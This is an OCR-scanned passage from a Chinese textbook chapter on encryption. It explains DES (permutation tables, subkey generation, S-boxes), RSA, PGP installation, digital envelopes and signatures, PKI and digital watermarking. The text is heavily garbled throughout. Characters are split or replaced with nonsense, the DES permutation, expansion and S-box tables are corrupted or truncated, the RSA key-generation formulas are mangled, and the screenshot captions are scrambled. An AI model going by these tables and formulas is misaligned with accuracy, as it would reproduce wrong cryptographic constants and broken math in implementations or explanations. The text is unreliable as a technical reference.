DES 算 法 的 工作 密 钥 ; Data 也 为 8 个 字 节 64 位 ,是 要 被 加 密 或 被 解密 的 数据 ,Mode 为 


DES 的 工作 方式 ,有 两 种 : 加 密 与 解密 。 
DES 算法 是 这 样 工作 的 : 如 Mode 为 加 密 , 则 用 Key 去 把 数据 Data 进行 加 密 , 生 成 
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Data 的 密码 形式 (64 位 ) 作 为 DES 的 输出 结果 ; 如 Mode 为 解密 , 则 用 Key 去 把 密码 形式 
的 数据 Data 解密 ,还 原 为 Data 的 明码 形式 (64 位 ) 作 为 DES 的 输出 结果 。 

在 通信 网 络 的 两 端 ,双方 约定 一 致 的 Key, 在 通信 的 源 点 用 Key 对 核心 数据 进行 DES 
加 密 ,然后 以 密码 形式 在 公共 通信 网 (如 电话 网 ) 中 传输 到 通信 网 络 的 终点 ,数据 到 达 目 的 地 
后 ,用 同样 的 Key 对 密码 数据 进行 解密 , 便 再 现 了 明码 形式 的 核心 数据 。 这样, 便 保 证 了 
核心 数据 在 公共 通信 网 中 传输 的 安全 性 和 可 靠 性 。 通 过 定期 在 通信 网 络 的 源 端 和 目的 
端 同时 改 用 新 的 Key, 便 能 更 进一步 提高 数据 的 保密 性 ,这 正 是 现在 金融 交易 网 络 的 流行 
做 法 。 


4.2.4 DES 算法 详 述 


第 一 步 : 变换 明文 。 对 给 定 的 64 位 明文 x, 首先 通过 一 个 置换 IP 表 来 重新 排列 z, 从 
而 构造 出 64 位 的 zo ,zo 二 IP(x)= 二 LoRo ,其 中 Lo 表示 xo 的 前 32 位 ,Ro 表示 xo 的 后 32 位 。 


第 二 步 : 按照 规则 迭代。 规则 为 输入 64 位 明文 | 
L; = Ria 1 
R, —Li G f (Ria .K) G= 127316) PEIA | 
经 过 第 一 步 变换 已 经 得 到 L 和 Ro 的 值 ,其 中 
符号 田 表 示 的 数学 运算 是 异 或 ,y 表示 一 种 置换 ， I; Ry 
由 S 盒 置换 构成 ,K; 是 一 些 由 密 钥 编排 函数 产生 ae 一 一 一 一 十 一 一 
的 比特 块 。/ RM 将 在 后 面 介绍 。 LFR 
第 三 步 : 对 LisRu 利 用 IP 一 做 道 置换 ,就 得 到 | REL AR MD | 
[XC yo 加 密 过 程 如 图 4-3 所 示 。 一 
从 图 4-3 中 可 以 看 出 ,DES 加 密 需要 4 个 关键 LITT | 
点 ,JP 置换 表 和 IP ERAS RC IT EI € | 


K: S 盒 的 工作 原理 。 
1. IP 置换 表 和 IPC E HA 
输入 的 64 位 数据 按 置 换 IP 表 进行 重新 组 合 , 并 把 输出 分 为 Lo、R。 两 部 分 ,每 部 分 各 长 
32 位 ,其 置换 TP 表 如 表 4-1 所 示 。 


图 4-3 DES 加 密 过 程 


表 4-1 o IP 置换 表 
58 50 42 34 26 18 10 2 60 52 44 36 28 20 12 
62 54 46 38 30 22 14 64 56 48 40 32 24 16 
57 49 4l 33 25 a7 9 l 59 51 43 35 27 19 11 
61 53 45 37 29 21 13 5 63 55 47 39 31 23 15 


o 
oo 0 必 


将 输入 64 位 数据 的 第 58 位 换 到 第 1 位 ,第 50 位 换 到 第 2 位 , 依 此 类 推 ,最 后 一 位 是 原 
来 的 第 7 位 。L。 Ro 则 是 换 位 输出 后 的 两 部 分 ,L。 是 输出 的 左 32 位 ,Ro 是 右 32 位 。 例 如 : 
置换 前 的 输入 值 为 Di D2 Ds Da. ,' 则 经 过 初始 置换 后 的 结果 为 : Lo 二 Dss Dso*…Ds ,Ro 二 Ds 
DaD. 

经 过 16 次 迭代 运算 后 。 得 到 Lis、Ris' 将 此 作为 输入 ,进行 逆 置 换 , 即 得 到 密 文 输出 。 
道 置换 正好 是 初始 值 的 逆 运 算 , 例 如 ,第 1 位 经 过 初始 置换 后 ,处 于 第 40 位 ,而 通过 逆 置 换 
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IP ,又 将 第 40 位 换 回 到 第 1 位 ,其 着 置换 IP “规则 如 表 4-2 所 示 。 
表 4-2 逆 置 换 表 IP! 
40 8 48 16 56 24 64 32 39 7 47 15 55 23 63 31 
38 6 46 14 54 22 62 30 37 5 45 13 53 21 61 29 
36 4 44 12 52 20 60 28 35 3 43 11 51 19 59 27 
34 2 42 10 50 18 58 26 33 1 41 9 49 17 57 25 
2. 函数 fo 
函数 f 有 两 个 输入 : 32 位 的 Ri-1 和 48 位 的 K;,f 函数 的 处 理 流程 如 图 4-4 所 示 o 
32 位 RI 
E 变 换 
48 位 
48 位 K 
48 位 
G) G2 G2 GO GO) CD CS GO 
pai 
P 变 换 
32 位 输出 


图 4-4 了 函数 的 处 理 流程 


放大 换 位 表 下 变换 的 算法 是 从 Ri hy 32 位 中 选取 某 些 位 ,构成 48 位 。 即 王将 32 位 


扩展 变换 为 48 位 ,变换 规则 根据 上 位 选择 表 , 如 表 4-3 所 示 。 


表 4-3 EERI 位 扩展 变换 为 48 位 
$2 ag 2 3 4 5 4 5 6 7 8 9 8 9 10 


11 


K, 是 由 密 钥 产生 的 48 位 数据 串 , 具 体 的 算法 为 将 下 的 选 位 结果 与 K; 做 异 或 运算 ,得 
到 一 个 48 位 输出 ,分 成 8 组 ,每 组 6 位 ,作为 8 个 S 盒 的 输入 。 每 个 S 盒 输出 4 位 , 共 32 
位 ,S 盒 的 工作 原理 将 在 第 4 步 介绍 。S 盒 的 输出 作为 P 变换 的 输入 ,P 的 功能 是 对 输入 进 


行 置换 ,P 换 位 表 如 表 4-4 所 示 。 
表 4-4 了 换 位 表 


16 7 20 21 29 12 28 17 1 15 23 26 5 18 31 


3. FEH k 


假设 密 钥 为 ,长 度 为 64 位 ,但 是 其 中 第 8、16、24、32、40、48、64 (7 JH VE SE IBS RIE 
位 ,实际 上 密 钥 长 度 为 56 fu. KAI FER i KPAI RE 1—16.)H 16 轮 来 构造 。 构 造 过 
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程 如 图 4-5 所 示 。 


64 位 密 钥 字符 串 K 
PC 变换 
56 位 
28 位 28 位 
Co Do 
— — a R 

LS, LS, 

i i 

€, D, 

PC: 变 换 一 48 位 Ki 

' 
LS; LS; 

i i 

c D; 

PC: 变 换 f 48 位 K> 

t ' 
LSis LSie 

i i 

Cis Dis 

| PC; 变 换 e 48 人 Kis 


图 4-5 子 密 钥 生成 
首先 ,对 于 给 定 的 密 钥 KK, 应 用 PC: 变换 进行 选 位 , 选 定 后 的 结果 是 56 位 , 设 其 前 28 
位 为 Co, 后 28 位 为 Dos PC: 选 位 如 表 4-5 所 示 。 
表 4-5 PC 选 位 表 


57 49 41 33 25 17 9 1 58 50 42 34 26 18 
10 2 59 51 43 35 27 19 11 3 60 52 44 36 
63 55 47 39 31 23 15 7 62 54 46 38 30 22 
14 6 61 53 45 37 29 21 13 5 28 20 12 4 


第 一 轮 : 对 Co 作 左 移 LS; 得 到 Ci XE Do 作 左 移 LS: 得 到 Di ,对 C Di 应 用 PC 进行 
选 位 ,得 到 Ki. Kp LS, 是 左 移 的 位 数 , 如 表 4-6 所 示 。 
表 4-6 LS 移 位 表 


表 4-6 中 的 第 一 列 是 LS, ,第 二 列 是 LS; ,以 此 类 推 。 左 移 的 原理 是 所 有 二 进位 向 左 移 
动 ,原来 最 右边 的 数据 位 移动 到 最 左边 。 其 中 PC. nde 4-7 所 示 。 


" 
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表 47 PC2 选 位 表 


14 17 ïi 24 1 5 3 28 15 6 21 10 
23 19 12, 4 26 8 16 g 27 20 13 2 
41 52 31 37 47 55 30 40 51 45 33 48 
44 49 39 56 34 53 46 42 50 36 29 32 
第 二 轮 : 对 Ci Di 作 左 移 LS2 得 到 Cs 和 Ds ,进一步 对 Co De 应 用 PCs 进行 选 位 ,得 


到 K,。 如 此 继续 ,分 别 得 到 K;,K,…Kie。 

4. S 盒 的 工作 原理 

S 盒 以 6 位 作为 输入 ,而 以 4 位 作为 输出 ,现在 以 Si 为 例 说 明 其 过 程 。 假 设 输入 为 A= 
à1243a40546 Sl] azasaias 所 代表 的 数 是 0 一 15 之 间 的 一 个 数 ( 行 ), 记 为 : & 一 azasaias; 由 
aas 所 代表 的 数 是 0 一 3 间 的 一 个 数 ( 列 ), 记 为 A 二 aras。 在 Si 的 h 行 ,k 列 找到 一 个 数 B， 
也 在 0 一 15 之 间 , 它 可 以 用 4 位 二 进 制 数 表 示 , 记 为 B= 二 60263b4, 这 就 是 S 的 输出 。 例 如 : 
当 向 S. 输入 011011 时 ,开头 和 结尾 的 组 合 是 01, 所 以 选中 编号 为 1 的 替代 表 , 根 据 中 间 4 
位 1101 , 选 定 13 列 ,查找 表 中 第 1 行 与 第 13 列 所 示 的 值 为 5, 即 输出 0101, 这 4 位 就 是 经 过 
替代 后 的 值 , 按 此 进行 ,输出 32 位 。S 盒 由 8 张 数据 表 组 成 ,如 图 4-6 所 示 。 


S 

14|4]|13|1]2]|15|11|8|3/]10|6]|12|5|9]|0]| 7 

0 |15|7 | 4 |14| 2 | 13 10|6|12|1119 5|3]|8 

4|[1/[14/,8/|13|6|2]|11|15|12|9 | 7| 3|10| 5| 0 

15|12|8|2|4|9|1|7]|5]|11|3]|14|10|0| 6 | 13 
(a) 

S: 

15|1[|8|14|6|11|3|4|9|7]|2]|13|12| 0| 5 30 

3|13|4|715|2]|8]|14|12|0 | 1 |10| 6| 9 |11| 5 

0|14|7|11/[10|4[|13| 1| 5| 8]|12|6|9| 3| 2 |15 

13| 8 |10| 1 3|15|4|2]11|6|7]|12| 0| 5 |14| 9 
(b) 

S: 

10 | 0 14|6|3]|15|5|1]13|12|7|11|4|2]| 8 

13| 7 9|3|4|6/|10|2]|8/|5]14|12|11[|15| 1 

13|]6|4|9|8]|15 0|11|1]|2]|12|5 |10|14| 7 

1110]13|0 6 |9 | 8 4|15|14|3]|11| 5 | 2| 12 
C 

S 

7 |13|/14| 3 6|9|10/1/|]2]|8]|5]|11/|12|4 |15 

13,8 |11| 5 15|0|3|4|7]|2]|12| 1 |10]14]| 9 

10 | 6 0|12|11|7 |13|15| 1| 3|14| 5 |2] 8| 4 
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(D 
46 组 成 S 盒 的 8 张 数据 表 
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4|ls[2]|m|o|s]|s:]|10|n|1|1]|7]|]6|o|8 |13 
(CD 
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e[n[las[s|[1[4[|1|7|9|5]|o |1|1|2|3 |1 
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1]: 13] 8 ]10] 3] z | 4 |12| 8| 6 [1| 0 | 14] 9 | 2 
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图 4-6 (Ho 


上 文 介绍 了 DES 算法 的 加 密 过 程 ,DES 算法 的 解密 过 程 是 一 样 的 ,区 别 仅仅 在 于 第 一 
次 迭代 时 用 子 密 钥 Kis ,第 二 次 用 Ku ,最 后 一 次 用 Ko. 算 法 本 身 并 没有 任何 变化 。DES 算 
法 的 密 钥 是 对 称 的 , 既 可 用 于 加 密 又 可 用 于 解密 。 

DES 算法 的 程序 实现 见 第 9 章 实验 七 。 


4.2.5 DES 算法 改进 


DES 算法 具有 比较 高 安全 性 ,到 目前 为 止 ,除了 用 穷 举 搜索 法 对 DES 算法 进行 攻击 
外 ,还 没有 发 现 更 有 效 的 办 法 。 而 56 位 长 的 密 钥 的 穷 举 空间 为 256, 这 意味 着 如 果 一 台 计 
算 机 的 速度 是 每 一 秒 钟 检测 一 百 万 个 密 钥 , 则 它 搜索 完全 部 密 钥 就 需要 将 近 2285 年 的 时 
间 , 可 见 , 这 是 难以 实现 的 ,当然 , 随 着 科学 技术 的 发 展 , 当 出 现 超 高 速 计 算 机 后 ,我 们 可 考虑 
把 DES 密 钥 的 长 度 再 增长 一 些 ,以 此 来 达到 更 高 的 保密 程度 。 


4.3 RSA 公 钥 加 密 技 术 


RSA 公 钥 加 密 算 法 是 1977 年 由 罗 纳 德 。 李维斯 特 (Ron Rivest) 阿迪。 萨 葛 尔 (Adi 
Shamir) 和 伦 纳 德 。 阿 德 曼 (Leonard Adleman) 一 起 提出 的 。 当 时 他 们 三 人 都 在 麻 省 理工 
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学 院 工作 ,RSA 就 是 他 们 三 人 姓氏 开头 字母 拼 在 一 起 组 成 的 。 

RSA 是 目前 最 有 影响 力 的 公 钥 加 密 算法 , 它 能 够 抵抗 到 目前 为 止 已 知 的 绝 大 多 数 密码 
攻击 ,已 被 ISO 推荐 为 公 钥 数据 加 密 标准 。 

今天 只 有 短 的 RSA 密 钥 才 可 能 被 强力 方式 破解 。 到 2008 年 为 止 ,世界 上 还 没有 任何 
可 靠 的 攻击 RSA 算法 的 方式 。 只 要 其 密 钥 的 长 度 足 够 长 ,用 RSA 加 密 的 信息 实际 上 是 不 
能 被 破解 的 。 但 在 分 布 式 计算 和 量子 计算 机 理论 日 趋 成 熟 的 今天 ,RSA 加 密 算法 的 安全 性 
受到 了 挑战 。 

RSA 算法 基于 一 个 十 分 简单 的 数论 事实 : 将 两 个 大 素数 相 乘 十 分 容易 ,但 想 要 对 其 乘 
积 进行 因 式 分 解 却 极其 困难 ,因此 可 以 将 乘积 公开 作为 加 密 密 钥 。 


4.3.1 RSA 算法 的 原理 


所 谓 的 公开 密 钥 密码 体制 就 是 使 用 不 同 的 加 密 密 钥 与 解密 密 钥 ,RSA 公开 密 钥 密码 体 
制 是 一 种 基于 大 数 不 可 能 质 因数 分 解 假设 的 公 钥 体系 ,在 公开 密 钥 密码 体制 中 ,加 密 密 钥 
( 即 公 开 密 钥 )PK 是 公开 信息 ,而 解密 密 钥 ( 即 秘密 密 钥 )SK 是 需要 保密 的 。 加 密 算法 E 和 
解密 算法 D 也 都 是 公开 的 。 虽 然 秘密 密 钥 SK 是 由 公开 密 钥 PK 决定 的 ,但 却 不 能 根据 PK 
计算 出 SK。 

正 是 基于 这 种 理论 ,1978 年 出 现 了 著名 的 RSA 算法 , 它 通常 是 先生 成 一 对 RSA 密 钥 ， 
其 中 之 一 是 私有 密 钥 ,由 用 户 保存 ; 另 一 个 为 公开 密 钥 ,可 对 外 公开 ,甚至 可 在 网 络 服务 器 
中 注册 。 为 提高 保密 强度 ,RSA 密 钥 至 少 为 500 位 长 ,一 般 推荐 使 用 1024 位 。 这 就 使 加 密 
的 计算 量 很 大 。 为 减少 计算 量 ,在 传送 信息 时 , 常 采用 传统 加 密 方法 与 公开 密 钥 加 密 方法 相 
结合 的 方式 , 即 信 息 采 用 改进 的 DES 或 IDEA 对 话 密 钥 加 密 , 然 后 使 用 RSA 密 钥 加 密 对 话 
密 钥 和 信息 摘要 。 对 方 收 到 信息 后 ,用 不 同 的 密 钥 解密 并 可 核对 信息 摘要 。 

RSA 体制 可 以 简单 描述 如 下 。 

(1) 生成 两 个 大 素数 p 和 g。 

(2) 计算 这 两 个 素数 的 乘积 n= pq. 

(3) 计算 小 于 n 并 且 与 n 互 质 的 整数 的 个 数 , 即 欧 拉 函数 on) — Cp D G— D. 

(4) 选择 一 个 随机 数 5 WE 1b eG ,并且 5 和 gg(m) 互 质 , 即 gcd(b,g(m)) 二 1。 

(5) 计算 ab=1 mod oln). 

(6) 保密 a、p 和 g ,公开 n 和 6。 

利用 RSA 加 密 时 ,明文 以 分 组 的 方式 加 密 : 每 一 个 分 组 的 长 度 应 该 小 于 logzn 位 。 加 
密 明 文 xz 时 ,利用 公 钥 (5,n) 来 计算 c= mod n 就 可 以 得 到 相应 的 密 文 <。 解 密 的 时 候 , 通 
过 计算 c" mod n 就 可 以 恢复 出 明文 zx。 

选取 的 素数 p 和 g 要 足够 大 ,从 而 使 乘积 n 足够 大 ,在 事先 不 知道 p 和 g 的 情况 下 分 解 
nn 是 计算 上 不 可 行 的。 程序 的 实现 见 第 9 章 实验 八 。 

常用 的 公 钥 加 密 算法 包括 : RSA 密码 体制 .EIlGamal 密码 体制 和 散 列 函数 密码 体制 
(MD4,MDS5 ^5), 


4.3.2 RSA 算法 的 安全 性 


RSA 算法 的 安全 性 依赖 于 大 数 分 解 ,但 是 否 等 同 于 大 数 分 解 一 直 未 能 得 到 理论 上 的 证 
明 , 因 为 没有 证 明 破 解 RSA 就 一 定 需 要 作 大 数 分 解 。 假 设 存在 一 种 无 须 分 解 大 数 的 算法 ， 
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那 它 肯定 可 以 修改 成 为 大 数 分 解 算 法 。RSA 的 一 些 变种 算法 已 被 证 明 等 价 于 大 数 分 解 。 
不 管 怎样 ,分 解 n 是 最 明显 的 攻击 方法 。 人 们 已 能 分 解 多 个 十 进 制 位 的 大 素数 。 因 此 , 模 数 
n 必须 选 大 一 些 , 由 具体 适用 情况 而 定 。 


4.3.3 RSA 算法 的 速度 


由 于 进行 的 都 是 大 数 计算 ,使 得 RSA 最 快 的 情况 也 比 DES 慢 上 好 几 倍 , 无 论 是 软件 还 
是 硬件 实现 ,速度 一 直 是 RSA 的 缺陷 ,一 般 来 说 只 用 于 少量 数据 加 密 。RSA 的 速度 是 同样 
安全 级 别 的 对 称 密码 算法 速度 的 千 分 之 一 左右 。 


4.4 PGP 加 密 技术 


4.4.1 PGP 简介 


互联 网 上 目前 应 用 比较 多 的 另 一 种 安全 技术 是 PGP(Pretty Good Privacy) 。 它 是 软件 
工程 师 齐 默 曼 1991 年 发 明 的 ,任何 人 都 可 以 用 这 个 工具 建立 自己 的 私 钥 对 自己 的 信息 进行 
加 密 。PGP 加 密 技术 现在 有 很 多 种 ,其 中 包括 用 于 个 人 文件 和 电子 邮件 加 密 的 软件 。 

PGP 是 一 个 基于 RSA 公 钥 加 密 体系 的 邮件 加 密 软 件 。PGP 加 密 系 统 是 采用 公开 密 钥 
加 密 与 传统 密 钥 加 密 相 结 合 的 一 种 加 密 技术 。 它 使 用 一 对 数学 上 相关 的 密 钥 , 其 中 一 个 ( 公 
钥 ) 用 来 加 密 信息 , 另 一 个 ( 私 钥 ) 用 来 解密 信息 。PGP 是 一 个 公 钥 加 密 程 序 ,与 以 前 的 加 密 
方法 不 同 的 是 PGP 公 钥 加 密 的 信息 只 能 用 私 钥 解 密 。 使 用 PGP 公 钥 加 密 法 ,你 可 以 广泛 
传播 公 钥 ,同时 安全 地 保存 好 私 钥 。 由 于 只 有 你 可 以 拥有 私 钥 , 任 何人 都 可 以 用 你 的 公 钥 加 
密 写 给 你 的 信息 ,而 不 用 担心 信息 被 人 窃听 。 因 此 ,使 用 PGP 制作 一 个 加 密 信息 不 需要 数 
字 证 书 , 甚 至 连 浏览 器 都 不 需要 ,只 要 有 一 个 电子 邮件 软件 和 一 个 密 钥 生成 软件 就 可 以 了 。 
企业 可 以 用 来 进行 内 部 密 钥 管理 ,甚至 于 在 数据 传 上 互联 网 之 前 就 进行 加 密 。 


4.4.2 PGP 加 密 软 件 介绍 


使 用 PGP 软件 可 以 简洁 而 高 效 地 实现 邮件 或 者 文件 的 加 密 .数字 签名 。PGP 8. 1 的 安 
装 界面 如 图 4-7 所 示 。 


Welcome 


Welcome to the PGP & 1 installer. We strongly recommend. 
coninung 


Ihat you exi all Windows programe belore. 
Thank you tor using ou products 


图 47 安装 界面 
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因为 是 第 一 次 安装 ,所 以 在 用 户 类 型 对 话 框 中 选择 “No, I'm a New User”, 如 图 4-8 
所 示 。 


User Type 
Please lel us i you have exiting PGP Keyings you'd ke to use. 


Do you akeady have PGP keyrings you would ike to use? 


F Yes, | already have keyrings. 
G No. 'm a New Used 


48 选择 用 户 类 型 


根据 需要 选择 安装 的 组 件 ,一 般 根据 默认 选项 就 可 以 了 :“PGPdisk Volume Security" 
的 功能 是 提供 磁盘 文件 系统 的 安全 性 ;“PGPmail for Microsoft Outlook/Outlook Express" 
提供 邮件 的 加 密 功 能 。 如 图 4-9 所 示 。 安 装 完成 如 图 4-10 所 示 ,需要 重新 启动 机 器 。 


Select Components 
Choose the components Setup will install 


Select the components you wani to install. and clear the components you do nol want to 


Desctiption 
PGPmail for ICQ NEL md 
PGPmal for Microsoft Outlook. pom 
PGPmail for Microsoft Outlook Express SEL 


f 
OE PGPmall lor Qualcomm Eudora 
C PGPmai lor GroupWise 


图 4-9 选择 安装 组 件 


重新 启动 后 在 程序 中 找到 PGP 下 的 PGPkeys, 启 动 如 图 4-11 所 示 ,点击 按钮 加 ,在 用 
户 信息 对 话 框 中 输入 相应 的 姓名 和 电子 邮件 地 址 ,如 图 4-12 所 示 ,在 PGP 密码 输入 框 中 输 
入 8 位 以 上 的 密码 并 确认 ,如 图 4-13 所 示 , 生 成 密 钥 如 图 4-14 所 示 。 

使 用 生成 的 密 钥 就 可 以 加 密 文件 和 邮件 了 ,具体 使 用 参见 第 9 章 实验 九 。 
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PGP 8.1 install complete. 


PGP 8.1 hat been successfully instaled. Before you can use 
the program, you must restart your computer. 


4-11 产生 密 钥 


PGP Key Generation Wizard 


Name and Email Assignment. 
Every key par must have a name associated with è The name and email address let 
your correspondents know that the public key they are using belongs lo you. 
Ful name meliner 


By associating an email address with your key pan. you will enable PGP to assist your 
conespondenls in selecting the correct public key when communicating with you. 


Emaladdess — ealiseighebtu edu cal 


«ri-sm)r-sm;)( *m 


图 4-12 ”用户 信 息 
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PGP Key Generation Wizard 


Passphiase Assignment 
You ivit ay vis cleciad by a pesce: Rie import What vc kaen tiis 
passphrate secret and do nol write t down. 


Your passphrase shouid be at least 8 characters long and shouid contain 
norralphabetic characters. 


[7] Hide Typing 


Passphase | 


PasspheseQualy (7077777777 — 3 


4-13 输入 密码 
7 pcpkeys DEOR 


File Edit View Keys Server Groups Help 
»7»j)pzcus-oHW 


Description 
ei Gaalimoifhebtu. e I 


es | 
4-14 生成 完 密 角 


4.5 数字 信封 和 数字 签名 


公 钥 密码 体制 在 实际 应 用 中 主要 包含 数字 信封 和 数字 签名 两 种 方式 。 
4.5.1 数字 信封 


数字 信封 是 公 钥 密码 体制 在 实际 中 的 一 个 应 用 ,是 用 加 密 技 术 来 保证 只 有 规定 的 特定 
收 信人 才能 阅读 通信 的 内 容 。 

数字 信封 的 功能 类 似 于 普通 信封 ,普通 信封 在 法 律 的 约束 下 保证 只 有 收 信人 才能 阅读 
信 的 内 容 , 数 字 信封 则 采用 密码 技术 保证 了 只 有 规定 的 接收 人才 能 阅读 信息 的 内 容 。 在 数 
字 信 封 中 ,信息 发 送 方 采用 对 称 密 钥 来 加 密 信 息 内 容 , 然 后 将 此 对 称 密 钥 用 接收 方 的 公开 密 
钥 来 加 密 ( 这 部 分 称 数字 信封 ) 之 后 ,将 它 和 加 密 后 的 信息 一 起 发 送 给 接收 方 ,接收 方 先 用 相 
应 的 私有 密 钥 打开 数字 信封 ,得 到 对 称 密 钥 ,然后 使 用 对 称 密 钥 解 开 加 密 信息 。 这 种 技术 的 
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安全 性 相当 高 。 这 样 就 保证 了 数据 传输 的 真实 性 和 完整 性 。 数 字 信封 主要 包括 数字 信封 打 
包 和 数字 信封 拆 解 ,数字 信封 打包 是 使 用 对 方 的 公 钥 将 加 密 密 钥 进行 加 密 的 过 程 , 只 有 对 方 
的 私 钥 才 能 将 加 密 后 的 数据 (通信 密 钥 ) 还 原 , 数 字 信封 拆 解 是 使 用 私 钥 将 加 密 过 的 数据 解 

在 一 些 重 要 的 电子 商务 交易 中 密 钥 必须 经 常 更 换 , 为 了 解决 每 次 更 换 密 钥 的 问题 ,结合 
对 称 加 密 技 术 和 公开 密 钥 技术 的 优点 , 它 克 服 了 私有 密 钥 加 密 中 私有 密 钥 分 发 困难 和 公开 
密 钥 加 密 中 加 密 时 间 长 的 问题 ,使 用 两 个 层次 的 加 密 来 获得 公开 密 钥 技 术 的 灵活 性 和 私有 
密 钥 技术 高 效 性 。 信 息 发 送 方 使 用 密码 对 信息 进行 加 密 , 从 而 保证 只 有 规定 的 收 信人 才能 
阅读 信 的 内 容 。 采 用 数字 信封 技术 后 ,即使 加 密 文 件 被 他 人 非法 截获 ,因为 截获 者 无 法 得 到 
发 送 方 的 通信 密 钥 , 故 不 可 能 对 文件 进行 解密 。 


4.5.2 数字 签名 


数字 签名 在 ISO7498-2 标准 中 定义 为 :“ 附 加 在 数据 单元 上 的 一 些 数据 ,或 是 对 数据 单 
元 所 作 的 密码 变换 ,这 种 数据 和 变换 允许 数据 单元 的 接收 者 用 以 确认 数据 单元 来 源 和 数据 
单元 的 完整 性 ,并 保护 数据 ,防止 被 人 (例如 接收 者 ) 进 行 伪造 "。 美 国电 子 签名 标准 (DSS， 
FIPS186-2) 对 数字 签名 做 了 如 下 解释 :“ 利 用 一 套 规 则 和 一 个 参数 对 数据 计算 所 得 的 结果 ， 
用 此 结果 能 够 确认 签名 者 的 身份 和 数据 的 完整 性 ”。 

所 谓 “ 数 字 签 名 ?就 是 通过 某 种 密码 运算 生成 一 系列 符号 及 代码 组 成 电子 密码 进行 签 
名 ,来 代替 书写 签名 或 印章 ,对 于 这 种 电子 式 的 签名 还 可 进行 技术 验证 ,其 验证 的 准确 度 是 
一 般 手 工 签名 和 图 章 的 验证 无 法 比拟 的 .“ 数 字 签名 ”是 目前 电子 商务 .电子 政务 中 应 用 最 
普遍 ,技术 最 成 熟 .可 操作 性 最 强 的 一 种 电子 签名 方法 。 它 采用 了 规范 化 的 程序 和 科学 化 的 
方法 ,用 于 鉴定 签名 人 的 身份 以 及 对 一 项 电子 数据 内 容 的 认可 。 

在 文件 上 手写 签名 长 期 以 来 被 用 作 作 者 身份 的 证 明 ,或 表明 签名 者 同意 文件 的 内 容 。 
实际 上 ,签名 体现 了 以 下 5 个 方面 的 保证 。 

COD 签名 是 可 信 的 。 签 名 使 文件 的 接收 者 相信 签名 者 是 慎重 地 在 文件 上 签名 的 。 

(2) 签名 是 不 可 伪造 的 。 签 名 证 明 是 签字 者 而 不 是 其 他 的 人 在 文件 上 签字 。 

(3) 签名 不 可 重用 。 签 名 是 文件 的 一 部 分 ,不 可 能 将 签名 移动 到 不 同 的 文件 上 。 

(4) 签名 后 的 文件 是 不 可 变 的 。 在 文件 签名 以 后 ,文件 就 不 能 改变 。 

(5) 签名 是 不 可 抵赖 的 。 签 名 和 文件 是 不 可 分 离 的 ,签名 者 事后 不 能 声称 他 没有 签 过 
这 个 文件 。 

目前 可 以 提供 “数字 签名 ”功能 的 软件 很 多 ,用 法 和 原理 都 大 同 小 异 , 其 中 比较 常用 的 有 
OnSign。 安 装 OnSign 后 ,在 Word、Outlook 等 程序 的 工具 栏 上 ,就 会 出 现 OnSign 的 快捷 
按钮 ,每 次 使 用 时 , 需 输 入 自己 的 密码 ,以 确保 他 人 无 法 次 用。 对 于 使 用 了 OnSign 寄 出 的 
文件 , 收 件 人 也 需要 安装 OnSign 或 OnSign Viewer, 这 样 才 具备 了 识别 “数字 签名 ”的 功能 。 
根据 OnSign 的 设计 ,任何 文件 内 容 的 自 改 与 拦截 ,都 会 让 签名 失效 。 因 此 当 对 方 识别 出 你 
的 “数字 签名 ”时 ,就 能 确定 这 份 文件 是 由 你 本 人 所 发 出 的 ,并 且 中 途 没有 被 算 改 或 拦截 过 。 
当然 如 果 收 件 人 还 不 放心 ,也 可 以 单 击 “数字 签名 ”上 的 蓝 色 问号 ,OnSign 就 会 再 次 自动 检 
查 , 如 果 文件 有 问题 ,“ 数 字 签 名 ”上 就 会 出 现 红色 的 警告 标志 。 具 体 使 用 请 参考 第 9 章 实 
验 十 。 
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在 电子 邮件 使 用 频繁 的 网 络 时 代 , 使 用 好 “数字 签名 ”, 就 像 传统 信件 中 的 “挂号 信 ”, 无 
疑 为 网 络 传输 文件 的 安全 又 增加 了 一 道 保 护 屏障 。 


4.5.3 PKI 公 钥 基础 设施 


PKI(Public Key Infrastructure, 公 钥 基 础 设施 ) 可 以 提供 数据 单元 的 密码 变换 ,并 能 使 
接收 者 判断 数据 来 源 及 对 数据 进行 验证 。 

PKI 的 核心 执行 机 构 是 电子 认证 服务 提供 者 , 即 通称 为 认证 机 构 CA (Certificate 
Authority) ,PKI 签名 的 核心 元 素 是 由 CA 签发 的 数字 证 书 。 它 所 提供 的 PKI 服务 就 是 认 
证 、 数 据 完整 性 ,数据 保密 性 和 不 可 否认 性 。 它 的 作法 就 是 利用 证 书 公 钥 和 与 之 对 应 的 
私 钥 进行 加 /解密 ,并 产生 对 数据 电文 的 签名 及 验证 签名 。 用 数字 签名 来 代替 书写 签名 
和 印章 ,这 种 电子 式 的 签名 还 可 进行 技术 验证 ,其 验证 的 准确 度 是 在 物理 世界 中 对 手工 
签名 和 图 章 的 验证 无 法 比拟 的 。 这 种 签名 方法 可 在 很 大 的 可 信 PKI 域 人 群 中 进行 认证 ， 
或 在 多 个 可 信和 的 PKI 域 中 进行 交叉 认证 , 它 特别 适用 于 互联 网 和 广域网 上 的 安全 认证 和 
传输 。 


4.6 数字 水 印 


4.6.1 数字 水 印 的 定义 

数字 水 印 (Digital Watermarking) 技 术 是 将 一 些 标识 信息 ( 即 数字 水 印 ) 直 接 租 入 数字 
载体 (包括 多 媒体 .文档 软件 等 ) 当 中 ,但 不 影响 原 载 体 的 使 用 价值 ,也 不 容易 被 人 的 知觉 系 
统 ( 如 视觉 或 听觉 系统 ) 觉 察 或 注意 到 。 通 过 这 些 隐藏 在 载体 中 的 信息 ,可 以 达到 确认 内 容 
创建 者 、 购 买 者 \ 传 送 隐 秘 信 息 或 者 判断 载体 是 否 被 自 改 等 目的 。 水 印 与 源 数据 紧密 结合 ; 
隐藏 其 中 ,成 为 源 数 据 不 可 分 离 的 一 部 分 ,并 可 以 经 历 一 些 不 破坏 源 数 据 使 用 价值 或 商用 价 
值 的 操作 而 存活 下 来 。 
4.6.2 ”数字 水 印 的 基本 特征 


根据 信息 隐藏 的 目的 和 技术 要 求 ,数字 水 印 应 具有 以 下 三 个 基本 特性 。 

1. 隐藏 性 (透明 性 ) 

水 印信 息 和 源 数据 集成 在 一 起 ,不 改变 源 数 据 的 存储 空间 ,嵌入 水 印 后 , 源 数据 必须 没 
有 明显 的 降 质 现象 ,水 印信 息 无 法 为 人 看 见 或 听见 ,只 能 看 见 或 听见 源 数 据 。 

2. 鲁 棒 性 (免疫 性 、 强 壮 性 ) 

鲁 棒 性 是 指 嵌 入 水 印 后 的 数据 经 过 各 种 处 理 操作 和 攻击 操作 以 后 ,不 导致 其 中 的 水 
